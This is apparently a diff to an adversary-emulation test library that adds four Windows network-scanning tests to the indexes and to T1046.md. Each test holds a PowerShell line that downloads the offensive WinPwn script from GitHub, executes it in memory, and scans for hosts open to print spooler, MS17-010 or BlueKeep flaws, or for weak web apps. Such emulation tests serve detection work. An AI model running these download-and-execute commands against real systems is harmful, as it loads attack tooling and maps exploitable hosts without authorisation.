diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 579aac8b..3a31b727 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -910,6 +910,10 @@ discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 492c0c9e..21570647 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -634,6 +634,10 @@ discovery,T1069.001,Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-
discovery,T1069.001,Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d5f7943c..0bd00f6f 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1434,6 +1434,10 @@
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
+ - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+ - Atomic Test #6: WinPwn - MS17-10 [windows]
+ - Atomic Test #7: WinPwn - bluekeep [windows]
+ - Atomic Test #8: WinPwn - fruit [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #2: Network Share Discovery - linux [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6f4a872b..6d0b5c4d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1035,6 +1035,10 @@
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
+ - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+ - Atomic Test #6: WinPwn - MS17-10 [windows]
+ - Atomic Test #7: WinPwn - bluekeep [windows]
+ - Atomic Test #8: WinPwn - fruit [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 0620591a..ea2da349 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -60280,6 +60280,55 @@ discovery:
'
name: powershell
+ - name: WinPwn - spoolvulnscan
+ auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
+ description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of
+ WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ spoolvulnscan -noninteractive -consoleoutput
+ name: powershell
+ - name: WinPwn - MS17-10
+ auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
+ description: Search for MS17-10 vulnerable Windows Servers in the domain using
+ powerSQL function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ MS17-10 -noninteractive -consoleoutput
+ name: powershell
+ - name: WinPwn - bluekeep
+ auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+ description: Search for bluekeep vulnerable Windows Systems in the domain using
+ bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds
+ in testing on a small domain).
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ bluekeep -noninteractive -consoleoutput
+ name: powershell
+ - name: WinPwn - fruit
+ auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
+ description: Search for potentially vulnerable web apps (low hanging fruits)
+ using fruit function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ fruit -noninteractive -consoleoutput
+ name: powershell
T1135:
technique:
object_marking_refs:
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 9c8ec794..f940110e 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -14,6 +14,14 @@ Within cloud environments, adversaries may attempt to discover services running
- [Atomic Test #4 - Port Scan using python](#atomic-test-4---port-scan-using-python)
+- [Atomic Test #5 - WinPwn - spoolvulnscan](#atomic-test-5---winpwn---spoolvulnscan)
+
+- [Atomic Test #6 - WinPwn - MS17-10](#atomic-test-6---winpwn---ms17-10)
+
+- [Atomic Test #7 - WinPwn - bluekeep](#atomic-test-7---winpwn---bluekeep)
+
+- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)
+
@@ -209,4 +217,124 @@ echo "Python 3 must be installed manually"
+
+
+
+## Atomic Test #5 - WinPwn - spoolvulnscan
+Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 54574908-f1de-4356-9021-8053dd57439a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+spoolvulnscan -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - WinPwn - MS17-10
+Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97585b04-5be2-40e9-8c31-82157b8af2d6
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+MS17-10 -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #7 - WinPwn - bluekeep
+Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+bluekeep -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #8 - WinPwn - fruit
+Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bb037826-cbe8-4a41-93ea-b94059d6bb98
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+fruit -noninteractive -consoleoutput
+```
+
+
+
+
+
+